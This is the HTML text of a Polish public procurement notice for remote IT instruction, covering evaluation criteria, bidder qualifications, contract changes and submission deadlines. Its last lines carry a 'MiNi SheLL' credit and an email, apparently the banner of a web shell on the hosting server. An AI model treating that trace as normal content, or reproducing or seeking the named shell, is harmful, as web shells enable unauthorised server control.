Gdańsk, zajęcia zdalne – <br/> platforma CMI<br/> f. Salę wykładową z dostępem do Internetu oraz niezbędny sprzęt zapewnia Zamawiający.<br/>2.	Do obowiązków prowadzącego zajęcia należy w szczególności :<br/>1/ Przygotowanie i przeprowadzenie zajęć zgodnie z harmonogramem.<br/>2/ Przeprowadzenie przed szkoleniem rozeznania poziomu wiedzy i umiejętności uczestników w danej <br/> dziedzinie w formie pre-testu oraz ponownej oceny wiedzy i umiejętności po zakończonym szkoleniu <br/> w celu potwierdzenia nabytych kompetencji przez uczestników w formie post-testu. <br/>3/ Przygotowanie materiałów.<br/>4/ Sprawowanie nadzoru nad frekwencją uczestników zajęć poprzez prowadzenie imiennej listy <br/> obecności w formie tradycyjnej lub elektronicznej.<br/>5/ Dyspozycyjność w godzinach prowadzenia zajęć </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 11812,20 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80000000-4 - Usługi edukacyjne i szkoleniowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">80300000-7 - Usługi szkolnictwa wyższego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-06-15</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Za najkorzystniejszą zostanie uznana oferta wykonawcy, która uzyska łącznie największą liczbę punktów zgodnie z poniższym wzorem:<br/> P = C + Dl + Dp+Dc +Do<br/>gdzie:<br/> P - łączna liczba punktów<br/> C – liczba punktów przyznana ofercie ocenianej w kryterium „Cena”<br/> Dl – Liczba punktów przyznana ofercie ocenianej w kryterium „Doświadczenie zawodowe w <br/> prowadzeniu zajęć z dziedziny informatyki lub pokrewnych, liczone w latach pracy”<br/> Dp - Liczba punktów przyznana ofercie w kryterium „Umiejętność programowania w jednym <br/> wybranym języku programowania (C++, Pyton, Scratch)”<br/> Dc - Liczba punktów przyznana ofercie ocenianej w kryterium „Znajomość i obsługa platformy <br/> e-learningowej Moodle” <br/> Do – Liczba punktów przyznana ocenianej ofercie w kryterium „Znajoość i obsługa <br/> narzędzi do prowadzenia zajęć online takich jak: MsTeams, Clickmeeting, Cisco Webex <br/> Teams”</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">50</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie zawodowe w prowadzeniu zajęć z dziedziny informatyki lub pokrewnych liczone w latach pracy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Umiejętność programowania w jednym wybranym języku programowania (C++, Pyton, Scratch)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">15</span></h3> <h3 class="mb-0">Kryterium 4</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Znajomość i obsługa platformy e-learningowej Moodle</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">5</span></h3> <h3 class="mb-0">Kryterium 5</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Znajomość i obsługa narzędzi do prowadzenia zajęć online takich jak: MsTeams, Clickmeeting, Cisco Webex Teams</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. Wykonawca spełni warunek udziału w postępowaniu dotyczący zdolności zawodowej <br/> jeżeli wykaże, że osoba która będzie uczestniczyć w wykonaniu zamówienia posiada:<br/><br/> 1/ wykształcenie wyższe w dziedzinie informatyka lub pokrewnych <br/> 2/ doświadczenie zawodowe w prowadzeniu zajęć z dziedziny informatyki lub <br/> pokrewnych liczone w latach pracy, <br/> 3/ umiejętność programowania w jednym wybranym języku programowania: C++, Pyton, <br/> Scratch <br/> 4/ znajomość i obsługa platformy e-learningowej MOODLE <br/> 5/ znajomość i obsługa min. 1 narzędzia do prowadzenia zajęć online takich jak: MsTeams, <br/> ClickMeeting, Webex<br/><br/> 2. Wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu lub <br/> kryteriów selekcji, w stosownych sytuacjach oraz w odniesieniu do konkretnego <br/> zamówienia lub jego części, polegać na zdolnościach technicznych lub zawodowych lub <br/> sytuacji finansowej lub ekonomicznej podmiotów udostępniających zasoby, niezależnie <br/> od charakteru prawnego łączących go z nimi stosunków prawnych.<br/><br/>3. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub <br/> doświadczenia wykonawcy mogą polegać na zdolnościach podmiotów udostępniających <br/> zasoby, jeśli podmioty te wykonają usługi, do realizacji których te zdolności są <br/> wymagane.<br/><br/>4. Wykonawca, który polega na zdolnościach lub sytuacji podmiotów udostępniających <br/> zasoby, składa wraz z wnioskiem o dopuszczenie do udziału w postępowaniu albo <br/> odpowiednio wraz z ofertą, zobowiązanie podmiotu udostępniającego zasoby do oddania <br/> mu do dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia lub <br/> inny podmiotowy środek dowodowy potwierdzający, że wykonawca realizując <br/> zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów.<br/><br/>5. Zobowiązanie podmiotu udostępniającego zasoby, o którym mowa w ust. 4 potwierdza, <br/> że stosunek łączący wykonawcę z podmiotami udostępniającymi zasoby gwarantuje <br/> rzeczywisty dostęp do tych zasobów oraz określa w szczególności:<br/><br/>1)	zakres dostępnych wykonawcy zasobów podmiotu udostępniającego zasoby,<br/>2)	sposób i okres udostępnienia wykonawcy i wykorzystania przez niego zasobów podmiotu udostępniającego te zasoby przy wykonywaniu zamówienia,<br/>3)	czy i w jakim zakresie podmiot udostępniający zasoby, na zdolnościach którego wykonawca polega w odniesieniu do warunków udziału w postępowaniu dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, zrealizuje roboty budowlane lub usługi, których wskazane zdolności dotyczą.<br/><br/> 6. Zamawiający ocenia, czy udostępnione Wykonawcy przez podmioty udostępniające <br/> zasoby zdolności techniczne lub zawodowe lub ich sytuacja finansowa lub <br/> ekonomiczna, pozwalają na wykazanie przez Wykonawcę spełniania warunków udziału <br/> w postępowaniu, o których mowa w art. 112 ust. 3 i 4 oraz, jeżeli to dotyczy kryteriów <br/> selekcji, a także bada, czy nie zachodzą wobec tego podmiotu podstawy wykluczenia, <br/> które zostały przewidziane względem wykonawcy.<br/><br/> 7. Podmiot, który zobowiązał się do udostępnienia zasobów odpowiada solidarnie z <br/> wykonawcą, który polega na jego sytuacji finansowej lub ekonomicznej, za szkodę <br/> poniesioną przez Zamawiającego powstałą wskutek nieudostępnienia tych zasobów, <br/> chyba, że za nieudostępnienie tych zasobów podmiot ten nie ponosi winy.<br/><br/> 8. Jeżeli zdolności techniczne lub zawodowe, sytuacja ekonomiczna lub finansowa <br/> podmiotu udostępniającego zasoby nie potwierdzają spełniania przez Wykonawcę <br/> warunków udziału w postępowaniu lub zachodzą wobec tego podmiotu podstawy <br/> wykluczenia, zamawiający żąda, aby wykonawca w terminie określonym przez <br/> zamawiającego zastąpił ten podmiot innym podmiotem lub podmiotami albo wykazał, że <br/> samodzielnie spełnia warunki udziału w postępowaniu.<br/><br/> 9. Wykonawca nie może, po upływie terminu składania ofert, powoływać się na zdolności <br/> lub sytuację podmiotów udostępniających zasoby, jeżeli na etapie składania ofert nie <br/> polegał on w danym zakresie na zdolnościach lub sytuacji podmiotów udostępniających <br/> zasoby. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1.	W celu potwierdzenia braku podstaw wykluczenia wykonawcy z udziału w postępowaniu o udzielenie zamówienia publicznego, zamawiający żąda następujących podmiotowych środków dowodowych:<br/> <br/> 1) oświadczenia wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku <br/> przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 <br/> lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2020 r. poz. 1076 i <br/> 1086), z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub <br/> wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o <br/> przynależności do tej samej grupy kapitałowej wraz z dokumentami lub <br/> informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub <br/> wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego <br/> wykonawcy należącego do tej samej grupy kapitałowej - wzór stanowi Załącznik nr <br/> 8 do SWZ.<br/><br/> 2) odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i <br/> Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, <br/> sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli <br/> przepisy wymagają wpisu do rejestru lub ewidencji <br/><br/>2.	Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej Polskiej, zamiast dokumentu o którym mowa w ust. 1 pkt. 2 Wykonawca składa dokument lub dokumenty wystawione w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające, że nie otwarto jego likwidacji, nie ogłoszono upadłości, jego aktywami nie zarządza likwidator lub sąd, nie zawarł układu z wierzycielami, jego działalność gospodarcza nie jest zawieszona ani nie znajduje się on w innej tego rodzaju sytuacji wynikającej z podobnej procedury przewidzianej w przepisach miejsca wszczęcia tej procedury. Dokument powinien być wystawiony nie wcześniej niż 3 miesiące przed jego złożeniem.<br/>3.	Zgodnie z art. 274 ust. 1 ustawy Pzp, przed wyborem najkorzystniejszej oferty zamawiający wezwie wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, podmiotowych środków dowodowych o których mowa w rozdziale IX pkt. 1 i X.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. W celu potwierdzenia spełnienia warunków udziału w postępowaniu zamawiający żąda:<br/> wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, <br/> w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości wraz z <br/> informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia <br/> i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu <br/> wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania <br/> tymi osobami – wzór wykazu stanowi Załącznik nr 5 do SWZ.<br/><br/> 2. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub <br/> doświadczenia wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą <br/> polegać na zdolnościach tych z wykonawców, którzy wykonają usługi, do realizacji <br/> których te zdolności są wymagane (art. 117 ust. 3 Pzp).<br/><br/> 3. W przypadku, o którym mowa w ust. 2, wykonawcy wspólnie ubiegający się o udzielenie <br/> zamówienia dołączają do oferty oświadczenie, z którego wynika, które usługi wykonają <br/> poszczególni wykonawcy. Wzór oświadczenia stanowi Załącznik nr 7 do SWZ.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie żąda przedmiotowych środków dowodowych w postępowaniu <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Pełnomocnictwo, jeżeli dotyczy <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia, a oferta taka <br/> spełniać musi następujące wymagania:<br/> 1) Wykonawcy muszą ustanowić Pełnomocnika do reprezentowania ich w <br/> postępowaniu o udzielenie zamówienia albo do reprezentowania ich w <br/> postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/><br/> 2) Wypełniając Formularz oferty, oraz inne dokumenty powołujące się na wykonawcę <br/> w miejscu np. „nazwa i adres wykonawcy” należy wpisać dane wykonawców <br/> wspólnie ubiegających się o zamówienie.<br/><br/> 3) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia solidarnie <br/> odpowiadają za podpisanie i wykonanie umowy.<br/><br/> 4) W ofercie powinien być podany adres do korespondencji i kontakt telefoniczny z <br/> Pełnomocnikiem wykonawców wspólnie ubiegających się o udzielenie zamówienia<br/><br/> 5) Przed podpisaniem umowy, wykonawcy składający ofertę wspólną będą mieli <br/> obowiązek przedstawić kopię umowy regulującej ich współpracę.<br/><br/> 6) W odniesieniu do wymagań każdy wykonawca składający ofertę wspólną musi <br/> udokumentować, że nie podlega wykluczeniu oraz spełnia warunki udziału w <br/> postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje spełnianie <br/> warunków udziału w postępowaniu.<br/><br/> 7) W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych <br/> lub doświadczenia wykonawcy wspólnie ubiegający się o udzielenie zamówienia <br/> mogą polegać na zdolnościach tych z wykonawców, którzy wykonają usługi,<br/> do realizacji których te zdolności są wymagane.<br/><br/> 8) W przypadku, o którym mowa w pkt. 7, wykonawcy wspólnie ubiegający <br/> się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego <br/> wynika, które usługi wykonają poszczególni wykonawcy – Wzór oświadczenia <br/> stanowi załącznik nr 7 do SWZ. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający zastrzega możliwość dokonania zmian w drodze aneksu do umowy. <br/> Zakres zmian może dotyczyć w szczególności: <br/>1.	terminów realizacji umowy. <br/>1)	Zmiana terminu realizacji umowy może wynikać w szczególności z:<br/> - przedłużającej się procedury wyłaniania Wykonawców, <br/> - z nieprzewidzianej przerwy w realizacji przedmiotu zamówienia<br/> - działania „siły wyższej”, żadna ze stron nie ponosi odpowiedzialności za <br/> wystąpienie i skutki siły wyższej, przez którą strony rozumieją zdarzenie o <br/> charakterze nadzwyczajnym, o nadzwyczajnych konsekwencjach, obiektywnie niemożliwe do przewidzenia, co do którego ze względu na moc oddziaływania nie można było podjąć skutecznych środków obrony,<br/>- zmiany przepisów prawnych, powodującej wydłużenie terminu realizacji <br/> zamówienia,<br/>- wystąpią inne, wyjątkowo niesprzyjające okoliczności uniemożliwiające <br/> wykonawcy wykonanie przedmiotu zamówienia w terminie, <br/>- wystąpią zmiany w harmonogramie prowadzenia zajęć, których nie dało się <br/> przewidzieć w chwili zawarcia umowy, które są korzystne dla zamawiającego i nie powodują zmiany przedmiotu umowy.<br/>W takim przypadku strony mogą zmienić termin realizacji zamówienia i/lub przesunąć termin zakończenia wykonania niniejszej umowy,<br/>2) Zmiany wysokości wynagrodzenia należnego wykonawcy, w przypadku:<br/>a)	zmiany stawki podatku od towarów i usług,<br/>b)	zmiany wysokości minimalnego wynagrodzenia za pracę na podstawie art. 2 ust. 3-5 ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę (t.j. Dz. U. 2002 Nr 200 poz. 1679 )<br/>c)	zmiany zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenie społeczne lub zdrowotne, jeżeli zmiany te będą miały wpływ na koszty wykonania zamówienia przez wykonawcę.<br/>d)	zmniejszenia/zwiększenia liczby godzin praktycznych do wykonania z uwagi na zmiany organizacyjne, które mogą zaistnieć w trakcie trwania semestru<br/>Zmiany te mogą być dokonane ze skutkiem nie wcześniej niż na dzień wejścia w życie przepisów lu okoliczności, z których one wynikają. Jeżeli, stosownie do pkt. a) opisanego wyżej, w czasie obowiązywania umowy nastąpi zmiana ustawowej stawki podatku od towarów i usług, i będzie ona miała wpływ na koszty wykonania zamówienia rzez wykonawcę, Strony dokonają odpowiedniej zmiany wynagrodzenia należnego wykonawcy, tj. jego procentowego podwyższenia o wartości procentowego wzrostu stawki podatku od towarów i usług lub jego procentowego obniżenia o wartość procentowego obniżenia stawki podatku od towarów i usług. W przypadku opisanym w pkt. b) i c) powyżej, wykonawca obowiązany jest przedłożyć zamawiającemu na piśmie szczegółową analizę porównawczą kosztów (przed i po nowelizacji stanowiącą wykaz poniesionych wydatków w związku ze zmianą w.w. przepisów z powołaniem się na stosowne przepisy, z których wynikają w/w zmiany, a także przedłożyć dokumenty (w tym oświadczenia dla celów podatkowych i ZUS) wykonawcy. W przypadku opisanym w pkt. d) w przypadku mniejszej/ większej od przewidywanej ilości słuchaczy, powodującej utworzenie mniejszej/większej ilości grup co spowoduje zmniejszenie/ zwiększenie niezbędnej do wykonania liczby godzin zajęć praktycznych przez wykonawcę, wynagrodzenie zostanie pomniejszone/ powiększone o wartość wynikającą ze zmniejszenia/zwiększenia liczby godzin do wykonania.<br/> 2. Zamawiający przewiduje zmianę kadry osobowej wykonawcy wskazanej w ofercie do wykonania zamówienia pod warunkiem zaproponowania innych osób spełniających wymagania opisane w warunkach udziału w postępowaniu .<br/>Zmiana kadry osobowej może być spowodowana:<br/> - chorobą wykonawcy,<br/> - śmiercią wykonawcy,<br/> - nienależytym wykonywaniem umowy.<br/> W takim przypadku wykonawca zobowiązany jest dokonać zmiany osoby realizującej <br/> zamówienie w terminie nie dłuższym niż 3 dni od dnia złożenia wniosku przez <br/> Zamawiającego. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-12-06 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">1.	Ofertę należy złożyć drogą elektroniczną za pośrednictwem Platformy pod adresem: https://platformazakupowa.pl/pn/pg_edu/proceedings na stronie dotyczącej przedmiotowego postępowania.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-12-06 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-01-04</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Wymagania techniczne i organizacyjne dot. korespondencji elektronicznej- ciąg dalszy zapisów:<br/>11.Ofertę należy złożyć: a)w formie elektronicznej (tj. z kwalifikowanym podpisem<br/>elektronicznym) lub b)w postaci elektronicznej opatrzonej podpisem zaufanym lub c)w postaci<br/>elektronicznej opatrzonej podpisem osobistym podpisaną przez osobę/osoby<br/>upoważnioną/upoważnione za pośrednictwem https://platformazakupowa.pl/pn/pg_edu . <br/>12.Podmiotowe środki dowodowe oraz inne dokumenty lub oświadczenia, o których mowa w<br/>rozporządzeniu MR z dnia 30.12.2020 r. składa się w formie elektronicznej, w postaci<br/>elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym, lub w formie<br/>dokumentowej, w zakresie i w sposób określony w przepisach rozporządzenia PRM z dnia<br/>30.12.2020 r.

Creat By MiNi SheLL
Email: jattceo@gmail.com